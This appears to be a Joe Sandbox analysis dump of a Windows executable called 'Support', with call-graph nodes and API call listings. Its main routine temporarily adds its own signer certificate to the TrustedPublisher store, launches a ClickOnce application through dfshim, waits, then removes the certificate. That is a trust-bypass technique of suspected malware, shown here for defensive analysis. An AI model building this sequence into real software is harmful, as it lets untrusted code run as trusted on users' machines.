c033f7 5722->5723 5725 c033fd 5722->5725 5726 c03376 5723->5726 5727 c033a0 5726->5727 5728 c03383 5726->5728 5727->5725 5729 c0339a 5728->5729 5730 c04869 _free 15 API calls 5728->5730 5731 c04869 _free 15 API calls 5729->5731 5730->5728 5731->5727 6190 c04c65 6194 c04c6f 6190->6194 6191 c04c7f 6193 c04869 _free 15 API calls 6191->6193 6192 c04869 _free 15 API calls 6192->6194 6195 c04c86 6193->6195 6194->6191 6194->6192 5868 c05ba6 5869 c05bd7 5868->5869 5871 c05bb1 5868->5871 5870 c05bc1 FreeLibrary 5870->5871 5871->5869 5871->5870 6609 c06026 6612 c0602b 6609->6612 6611 c0604e 6612->6611 6613 c05c56 6612->6613 6614 c05c63 6613->6614 6615 c05c85 6613->6615 6616 c05c71 DeleteCriticalSection 6614->6616 6617 c05c7f 6614->6617 6615->6612 6616->6616 6616->6617 6618 c04869 _free 15 API calls 6617->6618 6618->6615 5732 c09beb 5733 c09c04 __startOneArgErrorHandling 5732->5733 5735 c09c2d __startOneArgErrorHandling 5733->5735 5736 c0a1c4 5733->5736 5737 c0a1fd __startOneArgErrorHandling 5736->5737 5738 c0a224 __startOneArgErrorHandling 5737->5738 5739 c0a495 __raise_exc RaiseException 5737->5739 5740 c0a267 5738->5740 5741 c0a242 5738->5741 5739->5738 5742 c0a786 __startOneArgErrorHandling 15 API calls 5740->5742 5745 c0a7b5 5741->5745 5744 c0a262 __startOneArgErrorHandling _ValidateLocalCookies 5742->5744 5744->5735 5746 c0a7c4 5745->5746 5747 c0a838 __startOneArgErrorHandling 5746->5747 5749 c0a7e3 __startOneArgErrorHandling 5746->5749 5748 c0a786 __startOneArgErrorHandling 15 API calls 5747->5748 5750 c0a831 5748->5750 5749->5750 5751 c0a786 __startOneArgErrorHandling 15 API calls 5749->5751 5750->5744 5751->5750 6619 c04c2c 6620 c04bb1 6619->6620 6621 c04c4a 6619->6621 6622 c04bb6 FindClose 6620->6622 6624 c04bbd _ValidateLocalCookies 6620->6624 6625 c07570 6621->6625 6622->6624 6626 c075a9 6625->6626 6627 c047f9 __dosmaperr 15 API calls 6626->6627 6631 c075d5 _ValidateLocalCookies 6626->6631 6628 c075b2 6627->6628 6629 c0473d _abort 21 API calls 6628->6629 6630 c075bd _ValidateLocalCookies 6629->6630 6630->6620 6631->6620 6632 c0452d 6640 c05858 6632->6640 6634 c04537 6635 c04541 6634->6635 6636 c044a8 __dosmaperr 15 API calls 6634->6636 6637 c04549 6636->6637 6638 c04556 6637->6638 6645 c04559 6637->6645 6641 c05741 _abort 5 API calls 6640->6641 6642 c0587f 6641->6642 6643 c05897 TlsAlloc 6642->6643 6644 c05888 _ValidateLocalCookies 6642->6644 6643->6644 6644->6634 6646 c04569 6645->6646 6647 c04563 6645->6647 6646->6635 6649 c058ae 6647->6649 6650 c05741 _abort 5 API calls 6649->6650 6651 c058d5 6650->6651 6652 c058ed TlsFree 6651->6652 6653 c058e1 _ValidateLocalCookies 6651->6653 6652->6653 6653->6646 6654 c0142e 6657 c02cf0 6654->6657 6656 c0143f 6658 c044a8 __dosmaperr 15 API calls 6657->6658 6659 c02d07 _ValidateLocalCookies 6658->6659 6659->6656 5752 c08df1 5753 c08e15 5752->5753 5754 c08e2e 5753->5754 5756 c09beb __startOneArgErrorHandling 5753->5756 5757 c08e78 5754->5757 5760 c099d3 5754->5760 5758 c0a1c4 16 API calls 5756->5758 5759 c09c2d __startOneArgErrorHandling 5756->5759 5758->5759 5761 c099f0 DecodePointer 5760->5761 5762 c09a00 5760->5762 5761->5762 5763 c09a8d 5762->5763 5764 c09a82 _ValidateLocalCookies 5762->5764 5766 c09a37 5762->5766 5763->5764 5765 c047f9 __dosmaperr 15 API calls 5763->5765 5764->5757 5765->5764 5766->5764 5767 c047f9 __dosmaperr 15 API calls 5766->5767 5767->5764 5768 c01ff4 5771 c02042 5768->5771 5772 c01fff 5771->5772 5773 c0204b 5771->5773 5773->5772 5780 c023c3 5773->5780 5776 c023c3 43 API calls 5777 c02091 5776->5777 5794 c03e89 5777->5794 5800 c023d1 5780->5800 5782 c02086 5782->5776 5783 c023c8 5783->5782 5784 c06b14 _abort 2 API calls 5783->5784 5785 c03f29 5784->5785 5786 c03f35 5785->5786 5789 c06b6f _abort 33 API calls 5785->5789 5787 c03f3e IsProcessorFeaturePresent 5786->5787 5788 c03f5c 5786->5788 5790 c03f49 5787->5790 5791 c03793 _abort 23 API calls 5788->5791 5789->5786 5792 c04573 _abort 3 API calls 5790->5792 5793 c03f66 5791->5793 5792->5788 5795 c03e95 _abort 5794->5795 5796 c04424 _abort 33 API calls 5795->5796 5799 c03e9a 5796->5799 5797 c03f24 _abort 33 API calls 5798 c03ec4 5797->5798 5799->5797 5801 c023da 5800->5801 5802 c023dd GetLastError 5800->5802 5801->5783 5812 c026a4 5802->5812 5805 c02457 SetLastError 5805->5783 5806 c026df ___vcrt_FlsSetValue 6 API calls 5807 c0240b 5806->5807 5808 c02433 5807->5808 5809 c026df ___vcrt_FlsSetValue 6 API calls 5807->5809 5811 c02411 5807->5811 5810 c026df ___vcrt_FlsSetValue 6 API calls 5808->5810 5808->5811 5809->5808 5810->5811 5811->5805 5813 c02543 ___vcrt_FlsGetValue 5 API calls 5812->5813 5814 c026be 5813->5814 5815 c026d6 TlsGetValue 5814->5815 5816 c023f2 5814->5816 5815->5816 5816->5805 5816->5806 5816->5811 5872 c071b5 5873 c071bd 5872->5873 5874 c03f72 __fassign 33 API calls 5873->5874 5878 c071da 5873->5878 5875 c071fa 5874->5875 5875->5878 5884 c081b5 5875->5884 5879 c0726e MultiByteToWideChar 5879->5878 5881 c0725e 5879->5881 5880 c0722e 5880->5881 5883 c0723c MultiByteToWideChar 5880->5883 5881->5878 5882 c047f9 __dosmaperr 15 API calls 5881->5882 5882->5878 5883->5878 5883->5881 5885 c03f72 __fassign 33 API calls 5884->5885 5886 c07228 5885->5886 5886->5879 5886->5880 5887 c03eb5 5888 c03eb8 5887->5888 5889 c03f24 _abort 33 API calls 5888->5889 5890 c03ec4 5889->5890 5891 c04ab7 5896 c04c8a 5891->5896 5894 c04869 _free 15 API calls 5895 c04aca 5894->5895 5901 c04cbf 5896->5901 5899 c04ac1 5899->5894 5900 c04869 _free 15 API calls 5900->5899 5902 c04cd1 5901->5902 5906 c04c98 5901->5906 5903 c04d01 5902->5903 5904 c04cd6 5902->5904 5903->5906 5912 c0681b 5903->5912 5905 c0480c _abort 15 API calls 5904->5905 5907 c04cdf 5905->5907 5906->5899 5906->5900 5909 c04869 _free 15 API calls 5907->5909 5909->5906 5910 c04d1c 5911 c04869 _free 15 API calls 5910->5911 5911->5906 5913 c06826 5912->5913 5914 c0684e 5913->5914 5915 c0683f 5913->5915 5916 c0685d 5914->5916 5921 c07e13 5914->5921 5917 c047f9 __dosmaperr 15 API calls 5915->5917 5928 c07e46 5916->5928 5920 c06844 _abort 5917->5920 5920->5910 5922 c07e33 HeapSize 5921->5922 5923 c07e1e 5921->5923 5922->5916 5924 c047f9 __dosmaperr 15 API calls 5923->5924 5925 c07e23 5924->5925 5926 c0473d _abort 21 API calls 5925->5926 5927 c07e2e 5926->5927 5927->5916 5929 c07e53 5928->5929 5930 c07e5e 5928->5930 5931 c062ff 16 API calls 5929->5931 5932 c07e66 5930->5932 5938 c07e6f _abort 5930->5938 5937 c07e5b 5931->5937 5935 c04869 _free 15 API calls 5932->5935 5933 c07e74 5936 c047f9 __dosmaperr 15 API calls 5933->5936 5934 c07e99 HeapReAlloc 5934->5937 5934->5938 5935->5937 5936->5937 5937->5920 5938->5933 5938->5934 5939 c06992 _abort 2 API calls 5938->5939 5939->5938 5940 c01ab8 5941 c01aef 5940->5941 5942 c01aca 5940->5942 5942->5941 5949 c0209a 5942->5949 5947 c03e89 33 API calls 5948 c01b0d 5947->5948 5950 c023c3 43 API calls 5949->5950 5951 c01afc 5950->5951 5952 c020a3 5951->5952 5953 c023c3 43 API calls 5952->5953 5954 c01b06 5953->5954 5954->5947 5817 c012fb 5822 c01aac SetUnhandledExceptionFilter 5817->5822 5819 c01300 5823 c038f9 5819->5823 5821 c0130b 5822->5819 5824 c03905 5823->5824 5825 c0391f 5823->5825 5824->5825 5826 c047f9 __dosmaperr 15 API calls 5824->5826 5825->5821 5827 c0390f 5826->5827 5828 c0473d _abort 21 API calls 5827->5828 5829 c0391a 5828->5829 5829->5821 5955 c014bb IsProcessorFeaturePresent 5956 c014d0 5955->5956 5959 c01493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5956->5959 5958 c015b3 5959->5958 5960 c079bb 5962 c0790a 5960->5962 5961 c0791f 5963 c047f9 __dosmaperr 15 API calls 5961->5963 5964 c07924 5961->5964 5962->5961 5962->5964 5967 c0795b 5962->5967 5965 c0794a 5963->5965 5966 c0473d _abort 21 API calls 5965->5966 5966->5964 5967->5964 5968 c047f9 __dosmaperr 15 API calls 5967->5968 5968->5965 6660 c0383f 6661 c0384b ___scrt_is_nonwritable_in_current_image 6660->6661 6662 c03882 _abort 6661->6662 6668 c056e2 EnterCriticalSection 6661->6668 6664 c0385f 6665 c067cb __fassign 15 API calls 6664->6665 6666 c0386f 6665->6666 6669 c03888 6666->6669 6668->6664 6672 c0572a LeaveCriticalSection 6669->6672 6671 c0388f 6671->6662 6672->6671

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000104), ref: 00C01016
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00C01025
                                                                                                                                                                                                                                                  • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00C01032
                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00C01057
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00040000), ref: 00C01063
                                                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00C01082
                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00C010B2
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,?), ref: 00C010C5
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00002000), ref: 00C010F4
                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00C0110A
                                                                                                                                                                                                                                                  • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00C0111A
                                                                                                                                                                                                                                                  • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00C0112D
                                                                                                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 00C01134
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00C0113E
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00C0115D
                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00C0116E
                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00C01182
                                                                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00C01198
                                                                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00C011A9
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(dfshim), ref: 00C011BA
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00C011C6
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00009C40), ref: 00C011E8
                                                                                                                                                                                                                                                  • CertDeleteCertificateFromStore.CRYPT32(?), ref: 00C0120B
                                                                                                                                                                                                                                                  • CertCloseStore.CRYPT32(?,00000000), ref: 00C0121A
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00C01223
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00C01228
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00C0122D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                  • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                  • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                  • Opcode ID: eecf06939482279edbedd7dba114f757847bf2869c06640bce5e3c4ee20f182f
                                                                                                                                                                                                                                                  • Instruction ID: 6d6890a044a6d35543bcb81590420163a50e498f924e15b4905fbf7abc0bc12d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eecf06939482279edbedd7dba114f757847bf2869c06640bce5e3c4ee20f182f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05614CB1A40218ABEB21DF90DC45FAEBBB9FF48B54F154014FA24B7290C7719E01CBA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C0192B
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00C019F7
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C01A10
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00C01A1A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                  • Opcode ID: 3fc4dea7ee55c86967a05f5a8e67ee649e2994152e6af795facd9d92aedacf08
                                                                                                                                                                                                                                                  • Instruction ID: 240b4209ad8e517aeb4f7388f8827c3b12abea577fb0da9a5e505baec38b133b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fc4dea7ee55c86967a05f5a8e67ee649e2994152e6af795facd9d92aedacf08
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D3116B5D052189BDB21DFA4D9497CEBBB8AF08304F1041AAE40CAB290EB709A84DF45
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C0466B
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C04675
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00C04682
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                  • Opcode ID: bed343bd66c23b9f27f2aa42f7b031f59e2c485b01ac73ccbd07f4560173dfc0
                                                                                                                                                                                                                                                  • Instruction ID: 86103ede3c731395810b611efb35b310cd7bd3c305b95d8531764ba225897efe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bed343bd66c23b9f27f2aa42f7b031f59e2c485b01ac73ccbd07f4560173dfc0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7831B3B49012189BCB25DF64DD89B8DBBB8BF08310F5041EAE91CA7290EB749F85CF45
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002,00000000,?,00C03F66,00000003,00C0209F,00C01AFC), ref: 00C03698
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002,00000000,?,00C03F66,00000003,00C0209F,00C01AFC), ref: 00C0369F
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00C036B1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  • Opcode ID: 42d75d82af4d14be341cb7600b2768d2007fa93be976039e8c348854cdb9c92c
                                                                                                                                                                                                                                                  • Instruction ID: 0a38a7071a9e1b188c213dcbb0e5ec8fc5008f1ff7442bb9c23ca50ac5e1d135
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42d75d82af4d14be341cb7600b2768d2007fa93be976039e8c348854cdb9c92c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABE046B1010588AFCF11AF54CE09B5E3B29FF40349F010014FA168A2B1DB36EE42DB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C0A490,?,?,00000008,?,?,00C0A130,00000000), ref: 00C0A6C2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                  • Opcode ID: aed8a8aeb6afefac66102a455a5a92926221d60edcb03b43c07ab7a73bae9f97
                                                                                                                                                                                                                                                  • Instruction ID: 1f0379a912d3a956f85ed3c19ad6ebb6f32bd36479ca2dfc36750c154a4898dd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aed8a8aeb6afefac66102a455a5a92926221d60edcb03b43c07ab7a73bae9f97
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80B13A356106089FD719CF28C48AB647BF0FF45364F298658E9AACF2E1C335DA92CB41
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C01BEA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                  • Opcode ID: d54afe9c0d16b2fb9c6ab4e0f67d31644932034c669b5486db6cd0575f1c29f7
                                                                                                                                                                                                                                                  • Instruction ID: 1e7d8cd2ea000dde81f9f17872eef23a23b5d2de943efea6d6e8ffddeee42adb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d54afe9c0d16b2fb9c6ab4e0f67d31644932034c669b5486db6cd0575f1c29f7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0515AB1E146458BEB19CF65D8857AEBBF0FB49354F28802AD915EB290D378EA40CF50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00C01300), ref: 00C01AB1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                  • Opcode ID: b3c12971301be30529aacfe24b28eb247b0bf224516c2bf08529aef64e644db2
                                                                                                                                                                                                                                                  • Instruction ID: 3ca449112c3af234aae5274d76fb1b9522b7e917c0d1524f28bc214c96b7b159
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3c12971301be30529aacfe24b28eb247b0bf224516c2bf08529aef64e644db2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                  • Opcode ID: 2263cb9cbd6ab1779b810c80b01da6db302716ab7c4227f97a910c0288280064
                                                                                                                                                                                                                                                  • Instruction ID: 03fa465da21dbf0d99c583c4b414033e7444bbcd4e44401ada5ab8dbda7524e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2263cb9cbd6ab1779b810c80b01da6db302716ab7c4227f97a910c0288280064
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEA002746011059B9750CF356A5534D3599A545A9171644555509C5160D72448609A11

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 81 c06507-c0651b 82 c06589-c06591 81->82 83 c0651d-c06522 81->83 84 c06593-c06596 82->84 85 c065d8-c065f0 call c0667a 82->85 83->82 86 c06524-c06529 83->86 84->85 87 c06598-c065d5 call c04869 * 4 84->87 94 c065f3-c065fa 85->94 86->82 89 c0652b-c0652e 86->89 87->85 89->82 92 c06530-c06538 89->92 95 c06552-c0655a 92->95 96 c0653a-c0653d 92->96 100 c06619-c0661d 94->100 101 c065fc-c06600 94->101 98 c06574-c06588 call c04869 * 2 95->98 99 c0655c-c0655f 95->99 96->95 102 c0653f-c06551 call c04869 call c06078 96->102 98->82 99->98 104 c06561-c06573 call c04869 call c06176 99->104 105 c06635-c06641 100->105 106 c0661f-c06624 100->106 108 c06602-c06605 101->108 109 c06616 101->109 102->95 104->98 105->94 118 c06643-c06650 call c04869 105->118 115 c06632 106->115 116 c06626-c06629 106->116 108->109 111 c06607-c06615 call c04869 * 2 108->111 109->100 111->109 115->105 116->115 123 c0662b-c06631 call c04869 116->123 123->115
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00C0654B
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06095
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060A7
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060B9
